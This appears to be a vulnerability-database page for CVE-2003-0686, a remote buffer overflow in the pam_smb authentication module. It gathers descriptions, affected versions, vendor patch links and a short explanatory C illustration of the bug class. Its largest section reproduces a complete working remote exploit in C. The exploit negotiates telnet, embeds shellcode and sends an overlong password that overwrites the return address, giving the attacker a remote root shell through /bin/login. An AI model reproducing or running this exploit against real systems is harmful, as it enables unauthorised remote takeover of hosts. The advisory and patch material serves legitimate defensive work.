CVE-2003-0686
CVSS 7.5
Published: 2003-10-20 00:00:00
Revised: 2016-10-17 22:36:34

[Original] Buffer overflow in PAM SMB module (pam_smb) 1.1.6 and earlier, when authenticating to a remote service, allows remote attackers to execute arbitrary code.


[CNNVD] Pam_SMB Remote Buffer Overflow Vulnerability (CNNVD-200310-061)

pam_smb is an authentication module that authenticates users against an SMB server.
The login.c of the pam_smb module contains a remote buffer overflow; a remote attacker can exploit it to execute arbitrary commands on the system with the privileges of the module's process.
If an attacker supplies an overlong password, the buffer overflow is triggered while the pam_smb module parses it, and a carefully crafted submission can execute arbitrary commands on the system with the privileges of the process that invoked the pam_smb module.
Note that this vulnerability requires the user to exist in the password file so that they are allowed to log in and supply a password.
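To make the description concrete from the defender's side, here is an added illustration (not pam_smb's own code, and unrelated to the exploit further down the page) of the bug class it names: a fixed-size password buffer filled without a length check, beside the bounded copy a fix would use. PASS_MAX, the record layout and the marker field are assumptions made for the demonstration.

```c
#include <stdio.h>
#include <string.h>

/* Constructed illustration of the bug class described above, not pam_smb's
 * own code; PASS_MAX and the record layout are assumptions. The marker field
 * stands in for whatever follows the buffer in memory and makes the overwrite
 * visible without crashing the process. */
#define PASS_MAX 16
struct auth_req {
    char pass[PASS_MAX];
    char marker[8];
};

/* Vulnerable pattern: copy up to the NUL with no length check, so any
 * password longer than PASS_MAX-1 bytes spills into marker. */
void copy_password_unchecked(struct auth_req *r, const char *pw)
{
    char *dst = (char *)r;   /* byte view of the whole record */
    size_t i = 0;
    for (; pw[i] != '\0'; i++)
        dst[i] = pw[i];
    dst[i] = '\0';
}

/* Hardened form: measure at most PASS_MAX bytes and refuse input that leaves
 * no room for the terminator. Returns 0 on success, -1 when rejected. */
int copy_password_checked(struct auth_req *r, const char *pw)
{
    size_t n = 0;
    while (n < PASS_MAX && pw[n] != '\0')
        n++;
    if (n == PASS_MAX)
        return -1;
    memcpy(r->pass, pw, n + 1);
    return 0;
}

/* Runs the unchecked copy on a fresh record: 1 = marker clobbered, 0 = intact,
 * -1 = input too long for the demo (all writes are kept inside the record). */
int unchecked_copy_clobbers_marker(const char *pw)
{
    struct auth_req r;
    memset(&r, 0, sizeof r);
    memcpy(r.marker, "CANARY!", sizeof r.marker);
    if (strlen(pw) + 1 > sizeof r)
        return -1;
    copy_password_unchecked(&r, pw);
    return memcmp(r.marker, "CANARY!", sizeof r.marker) != 0;
}
```

A 20-byte password overwrites the marker in the unchecked version, while the checked version rejects anything of PASS_MAX bytes or more before touching the buffer.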
        

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:dave_airlie:pam_smb:1.1.6    Samba pam_smb 1.1.6
cpe:/a:redhat:pam_smb:1.1.6-2::ia64
cpe:/a:redhat:pam_smb:1.1.6-5::i386
cpe:/a:dave_airlie:pam_smb:1.1.4    Samba pam_smb 1.1.4
cpe:/a:dave_airlie:pam_smb:1.1      Samba pam_smb 1.1
cpe:/a:dave_airlie:pam_smb:1.1.5    Samba pam_smb 1.1.5
cpe:/a:redhat:pam_smb:1.1.6-7::i386
cpe:/a:dave_airlie:pam_smb:1.1.2    Samba pam_smb 1.1.2
cpe:/a:redhat:pam_smb:1.1.6-2::i386
cpe:/a:dave_airlie:pam_smb:1.1.3    Samba pam_smb 1.1.3
cpe:/a:dave_airlie:pam_smb:1.1.1    Samba pam_smb 1.1.1
cpe:/a:dave_airlie:pam_smb:2.0_rc4  Samba pam_smb 2.0 rc4

- OVAL (technical details for detection)

oval:org.mitre.oval:def:469    Buffer Overflow in PAM SMB Module
*OVAL describes in detail how to detect this vulnerability; the related OVAL definition gives further technical details on detecting it.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0686
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0686
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200310-061
(official data source) CNNVD

- Other links and resources

http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000734
(UNKNOWN)  CONECTIVA  CLA-2003:734
http://marc.info/?l=bugtraq&m=106252769930090&w=2
(UNKNOWN)  BUGTRAQ  20030901 GLSA: pam_smb (200309-01)
http://us2.samba.org/samba/ftp/pam_smb/
(UNKNOWN)  CONFIRM  http://us2.samba.org/samba/ftp/pam_smb/
http://www.debian.org/security/2003/dsa-374
(VENDOR_ADVISORY)  DEBIAN  DSA-374
http://www.kb.cert.org/vuls/id/680260
(UNKNOWN)  CERT-VN  VU#680260
http://www.redhat.com/support/errata/RHSA-2003-261.html
(UNKNOWN)  REDHAT  RHSA-2003:261
http://www.redhat.com/support/errata/RHSA-2003-262.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2003:262
http://www.turbolinux.com/security/TLSA-2003-50.txt
(UNKNOWN)  TURBO  TLSA-2003-50

- Vulnerability information

Pam_SMB Remote Buffer Overflow Vulnerability
High severity  Boundary condition error
2003-10-20 00:00:00 2006-09-22 00:00:00
Remote
        

- Advisories and patches

        Vendor patches:
        Debian
        ------
        
        http://www.debian.org/security/2003/dsa-374

        RedHat
        ------
        Red Hat has released a security advisory (RHSA-2003:261-01) and corresponding patches for this issue:
        RHSA-2003:261-01: Updated pam_smb packages fix remote buffer overflow.
        Link: https://www.redhat.com/support/errata/RHSA-2003-261.html
        Patch downloads:
        Red Hat Linux 7.2:
        SRPMS:
        ftp://updates.redhat.com/7.2/en/os/SRPMS/pam_smb-1.1.6-9.7.src.rpm
        i386:
        ftp://updates.redhat.com/7.2/en/os/i386/pam_smb-1.1.6-9.7.i386.rpm
        ia64:
        ftp://updates.redhat.com/7.2/en/os/ia64/pam_smb-1.1.6-9.7.ia64.rpm
        Red Hat Linux 7.3:
        SRPMS:
        ftp://updates.redhat.com/7.3/en/os/SRPMS/pam_smb-1.1.6-9.7.src.rpm
        i386:
        ftp://updates.redhat.com/7.3/en/os/i386/pam_smb-1.1.6-9.7.i386.rpm
        Red Hat Linux 8.0:
        SRPMS:
        ftp://updates.redhat.com/8.0/en/os/SRPMS/pam_smb-1.1.6-9.8.src.rpm
        i386:
        ftp://updates.redhat.com/8.0/en/os/i386/pam_smb-1.1.6-9.8.i386.rpm
        Red Hat Linux 9:
        SRPMS:
        ftp://updates.redhat.com/9/en/os/SRPMS/pam_smb-1.1.6-9.9.src.rpm
        i386:
        ftp://updates.redhat.com/9/en/os/i386/pam_smb-1.1.6-9.9.i386.rpm

- Vulnerability information (89)

Linux pam_lib_smb < 1.1.6 /bin/login Remote Exploit (EDBID:89)
linux remote
2003-08-29 Verified
23 vertex
N/A
/*
 * Linux pam_lib_smb < 1.1.6  /bin/login exploit
 * by vertex  
 *
 * Tested on Redhat 8.0, 9.0
 * 
 * 
 * Advisory at 
 * 	http://us2.samba.org/samba/ftp/pam_smb/
 *
 * code based on : UC_login.c
 * SunOS 5.6,5.7,5.8 remote /bin/login root exploit
 * [mikecc/unixclan]
 * 
 * =============================================================
 * In order to use pam_lib_smb, need to add following line on top 
 * of /etc/pam.d/login 
 * 
 * auth       required     /lib/security/pam_smb_auth.so
 * 
 * And config the /etc/pam_smb.conf correctly.
 * 
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <arpa/telnet.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <unistd.h>
#include <getopt.h>

/* first negotiate */
/* packet capture by ethereal */
char packet_1[] = {
0xff, 0xfd, 0x03, 0xff, 0xfb, 0x18, 0xff, 0xfb, 
0x1f, 0xff, 0xfb, 0x20, 0xff, 0xfb, 0x21, 0xff, 
0xfb, 0x22, 0xff, 0xfb, 0x27, 0xff, 0xfd, 0x05, 
0xff, 0xfb, 0x23 };
char packet_2[] = {
0xff, 0xfa, 0x1f, 0x00, 0x62, 0x00, 0x22, 0xff, 
0xf0, 0xff, 0xfa, 0x20, 0x00, 0x33, 0x38, 0x34, 
0x30, 0x30, 0x2c, 0x33, 0x38, 0x34, 0x30, 0x30, 
0xff, 0xf0, 0xff, 0xfa, 0x23, 0x00, 0x6c, 0x69, 
0x64, 0x73, 

/* in between ,adding sc */
0x3a, 0x30, 0xff, 0xf0, 0xff, 0xfa, 
0x27, 0x00, 0x03, 0x58, 0x41, 0x55, 0x54, 0x48, 
0x4f, 0x52, 0x49, 0x54, 0x59, 0x01, 0x2f, 0x68, 
0x6f, 0x6d, 0x65, 0x2f, 0x78, 0x69, 0x65, 0x2f, 
0x2e, 0x58, 0x61, 0x75, 0x74, 0x68, 0x6f, 0x72, 
0x69, 0x74, 0x79, 0x00, 0x44, 0x49, 0x53, 0x50, 
0x4c, 0x41, 0x59, 0x01, 
};

char packet_2_1[]={

0x6c, 0x69, 0x64, 0x73, 
0x3a, 0x30, 0xff, 0xf0, 0xff, 0xfa, 0x18, 0x00, 
0x58, 0x54, 0x45, 0x52, 0x4d, 0xff, 0xf0 };

/* here is the TERM value */
/*
*/

void login(int);
void negotiate(int);
void sendstr(int,char *,int);
void wont(int sd,int opt);
void will(int sd,int opt);
void cmd(int sd,int opt);

/* ascii shellcode by shellforge (by phillipe biodi)*/
unsigned char sc[] =
"hAAAAX5AAAAHPPPPPPPPahA000X5nCX0PhA004X5nRYZPh0A"
"DAX5owxnPTYI19II19h0200X5U9knPTYII19I19hA000X5sO"
"kBPTY19I19I19h4000X59cF4PTY19II19I19h0000X5000FP"
"TY19I19h0002X500w9PTYI19I19h0A00X5uR00PTYII19I19"
"h04AAX5ByVyPTY19II19I19h600AX59FMVPTY19I19I19h00"
"0AX500LZPTY19II19h00E0X5Btz0PTYII19hA4A0X5R8p9PT"
"Y19I19II19h0D20X5Lx8LPTY19h0000X5000kPh00A0X5fcV"
"0PTYI19I19h00B0X5eFXgPTYI19II19\xff\xff\xe4";


int main(int argc,char **argv)
{
        struct sockaddr_in sock;
        struct hostent *pHe;
        int sd;   
	short port = -1;
	int x;
	char *host = NULL;
	char *user = NULL;
	char exp[1024]; 
	int a;
	char *default_port = "23";

	printf("linux_pam_smb\n");
	printf("Linux lib_pam_smb < 1.1.6 /bin/login remote exploit\n");
	printf("[vertex//lids/org]\n\n");
	if (argc < 2) 
	{
		printf("%s -h <victim> [-p port] \n",argv[0]);
		return 0;
	}
	while ((a = getopt(argc,argv,"h:p:u:")) != -1)
	{
		switch (a)	
		{
			case 'h':
				host = optarg;
				break;
			
                        case 'p':
                                port = atoi(optarg);
                                break;

			default:
				printf("[-] invalid option.\n");
				break;
		}
	}
	if (host == NULL)
	{
		printf("[-] must specify a host to attack\n"); 
		return 0;
        }
	if (port < 0)
		port = atoi(default_port);
	if ((pHe = gethostbyname(host)) == NULL)
        {
                printf("Host lookup error.\n");
                return 0;
        }
	printf("[*] attacking %s:%d\n",host,port);
	printf("[*] opening socket\n");
        if ((sd = socket(AF_INET,SOCK_STREAM,0)) == -1)
        {
                printf("[-] could not create socket");
                return 0;
        }
	sock.sin_family = AF_INET;
	sock.sin_port = htons(port);
	memcpy(&sock.sin_addr.s_addr,pHe->h_addr,pHe->h_length);
	if ((connect(sd,(struct sockaddr *)&sock,sizeof(sock))) == -1)
        {
                printf("[-] failed to connect to %s\n",host);  
                return 0;
        }
	printf("[*] connected!\n");
	printf("[*] Begin negotiate... \n");
	negotiate(sd);
	printf("[*] Login... \n");
	login(sd);
	return 0;
}


void login(int sd)
{
	char buf[1024];
	char exploit_buf[172];
	char cx[3]="\r\n\0";
	int x;
  	fd_set rset;

	memset(exploit_buf,'\0',172);
	/* let's jump to 0xbffffe30 */
	/* eb 30 fe ff bf */

	x = 0;
	exploit_buf[x++]=0x68;
	/* push 0xbffffe30 */
	/* shellcode address */
	exploit_buf[x++]=0x30;
	exploit_buf[x++]=0xfe;
	exploit_buf[x++]=0xff;
	exploit_buf[x++]=0xff;
	exploit_buf[x++]=0xff;
	exploit_buf[x++]=0xbf;
	exploit_buf[x++]=0xbf;
	/* ret */
	exploit_buf[x++]=0xc3;
	
	memset(exploit_buf+x,'A',150);
	x+=150;

/* will jmp in the middle of the NOP */
/* overwrite the eip with 0x40000f4f libc-2.3.2 */
/* at this address it is 
	pop $exx
	pop $exx
	ret 
*/
	exploit_buf[x++]=0xb5;
	exploit_buf[x++]=0xd4;

	sleep(2);

	memset(buf,'\0',sizeof(buf));
	strcpy(buf, "xie\r\n\0");

	printf("[*] sending username \n");
	sendstr(sd,buf,strlen(buf));
	
	sleep(1);
	printf("[*] sending password\n");
	sleep(2);

	memset(buf,'\0',sizeof(buf));
	strcpy(buf, exploit_buf);
	strcat(buf,"\r\n\0");
	sendstr(sd,buf,strlen(buf));

	sleep(2);
	fflush(stdout);
	FD_ZERO(&rset);
	while (1)
	{
		FD_SET(sd,&rset);
		FD_SET(0,&rset); 
		select(sd+1,&rset,0,0,0);
		if (FD_ISSET(sd,&rset)) 
		{
			memset(buf,'\0',sizeof(buf));
			if ((x = read(sd,buf,sizeof(buf)-1)) == 0)
			{
				printf("Connection closed by foreign host.\n");
				exit(-1);
			}
			fprintf(stderr,"%s",buf);
		}
		if (FD_ISSET(0,&rset))
		{
			memset(buf,'\0',sizeof(buf));
			if ((x = read(0,buf,sizeof(buf)-1)) > 0)
			{
				write(sd,buf,x);
			}
		}
	}
}		

/*
 * telnet negotiation needed for
 * talking with the telnet protocol
*/

void negotiate(int sd)
{
	char buf[1024];
	char nop[64];
	int len;

	sendstr(sd, packet_1,sizeof(packet_1));
	sleep(2);

	memset(buf,'\0',sizeof(buf));
	memset(nop,'A',sizeof(nop));
	memcpy(buf,packet_2,sizeof(packet_2));
	/* adding NOP */
	memcpy(buf+sizeof(packet_2), nop, sizeof(nop));
	/* shellcode */
	memcpy(buf+sizeof(packet_2)+sizeof(nop), sc, sizeof(sc));
	/* left packet */
	memcpy(buf+sizeof(packet_2)+sizeof(nop)+sizeof(sc),packet_2_1,sizeof(packet_2_1));
	
	len = sizeof(packet_2) +sizeof(packet_2_1) + sizeof(nop)+sizeof(sc) ;
	sendstr(sd, buf, len);
	sleep(1);
	
	/* wont echo */
	wont(sd,TELOPT_ECHO);
	sleep(1);
	/* do echo */
	cmd(sd,TELOPT_ECHO);

	sleep(2);
}

/* 
 * send a telnet WONT
 *
 * structure of a telnet WONT is:
 * 	1. IAC
 * 	2. WONT
 *	3. what you wont do
 *	(all of the above are found in arpa/telnet.h)
*/

void wont(int sd,int opt)
{
	char buf[3];
	sprintf(buf,"%c%c%c",IAC,WONT,opt);
	write(sd,buf,3); /* no error checking, uh-oh! */
}

/*
 * send a telnet WILL
 *
 * structure of a telnet WILL is:
 *	1. IAC
 *	2. WILL
 *	3. what you will do 
 *	(all of the above are found in arpa/telnet.h)
*/

void will(int sd,int opt)
{
	char buf[3];
	sprintf(buf,"%c%c%c",IAC,WILL,opt);
        write(sd,buf,3); /* no error checking, uh-oh! */
}   
void cmd(int sd,int opt)
{
	char buf[3];
	sprintf(buf,"%c\xfd%c",IAC,opt);
	write(sd,buf,3); /* no error checking, uh-oh! */
}
/*
 *
 */
void sendstr(int sd,char *str,int length)
{

        write(sd,str,length);
	sleep(1);
}


// milw0rm.com [2003-08-29]
		

- Vulnerability information

2476
PAM SMB Module (pam_smb) Service Authentication Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

Unknown or Incomplete

- Timeline

2003-08-27 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Pam_SMB Remote Buffer Overflow Vulnerability
Boundary Condition Error 8491
Yes No
2003-08-26 12:00:00 2009-07-11 11:56:00
Discovery of this vulnerability has been credited to Craig Miskell.

- Affected program versions

Sun Linux 5.0.7
SGI ProPack 2.3
SGI ProPack 2.2.1
RedHat pam_smb-1.1.6-7.i386.rpm
+ RedHat Linux 9.0 i386
RedHat pam_smb-1.1.6-5.i386.rpm
+ RedHat Linux 8.0 i386
RedHat pam_smb-1.1.6-2.ia64.rpm
+ RedHat Linux 7.2 ia64
RedHat pam_smb-1.1.6-2.i386.rpm
+ RedHat Linux 7.3 i386
RedHat pam_smb-1.1.6-2.i386.rpm
+ RedHat Linux 7.2 i386
pam_smb pam_smb 2.0 -rc4
pam_smb pam_smb 1.1.6
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ Red Hat Enterprise Linux AS 2.1 IA64
+ Red Hat Enterprise Linux AS 2.1
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux WS 2.1 IA64
+ RedHat Enterprise Linux WS 2.1
pam_smb pam_smb 1.1.5
pam_smb pam_smb 1.1.4
pam_smb pam_smb 1.1.3
pam_smb pam_smb 1.1.2
pam_smb pam_smb 1.1.1
pam_smb pam_smb 1.1
pam_smb pam_smb 2.0 -rc5
pam_smb pam_smb 1.1.7

- Unaffected program versions

pam_smb pam_smb 2.0 -rc5
pam_smb pam_smb 1.1.7

- Vulnerability discussion

pam_smb has been reported prone to a buffer overflow vulnerability. It has been reported that systems using pam_smb to authenticate to a remotely accessible service may be vulnerable to a condition that could allow a remote attacker to supply and execute arbitrary code in the context of the vulnerable module.

- Exploit

An exploit has been developed by Vertex.

- Solution

Sun has released fixes to address this vulnerability in Sun Linux 5.0.7. Users who are affected by this issue are advised to apply the relevant fixes as soon as possible. Please see the Sun reference (Sun Linux Support - Sun Linux Patches (Sun)) for further details regarding obtaining and applying appropriate fixes.

Red Hat has released a security advisory (RHSA-2003-262) to address this issue for enterprise customers. Further information regarding obtaining and applying fixes can be found in the referenced advisory.

Red Hat has released a security advisory (RHSA-2003:261-01) to address this issue. Customers who are affected by this issue are advised to apply the relevant fixes as soon as possible. Fixes are linked below. Further information regarding applying fixes can be found in the referenced advisory.

Debian has released an advisory (DSA 374-1) that addresses this issue. Please see the attached advisory for details on obtaining and applying fixes.

Turbolinux has released an advisory (TLSA-2003-50) that addresses this issue. Please see the attached advisory for details on obtaining and applying fixes.

Gentoo Linux has released a security advisory (200309-01) to address this issue. Users who are affected by this issue are advised to do the following:

emerge sync
emerge pam_smb
emerge clean

SuSE has released an advisory (SuSE-SA:2003:036) that addresses this issue. Please see the attached advisory for details on obtaining and applying fixes.

Conectiva has released an advisory (CLSA-2003:733) that addresses this issue. Please see references for details on obtaining and applying fixes.

Conectiva has released an advisory (CLSA-2003:734) containing updated packages that addresses this issue. Please see references for details on obtaining and applying fixes.

SGI has released an advisory (20031002-01-U) pertaining to their ProPack Linux distribution. The advisory has been released in response to a number of RHSA advisories, and includes a patch (Patch 10027) containing updated RPM packages relating to 22 different BIDs.

Patch 10027 can be obtained via the following link:
http://support.sgi.com/

For information regarding how to obtain individual RPM packages included in Patch 10027, please see the attached advisory.

pam_smb has released a stable upgrade to address this issue:


RedHat pam_smb-1.1.6-2.ia64.rpm
RedHat pam_smb-1.1.6-5.i386.rpm
RedHat pam_smb-1.1.6-2.i386.rpm
RedHat pam_smb-1.1.6-2.i386.rpm
RedHat pam_smb-1.1.6-7.i386.rpm
pam_smb pam_smb 1.1
pam_smb pam_smb 1.1.1
pam_smb pam_smb 1.1.2
pam_smb pam_smb 1.1.3
pam_smb pam_smb 1.1.4
pam_smb pam_smb 1.1.5
pam_smb pam_smb 1.1.6
Sun Linux 5.0.7

- References

 

 
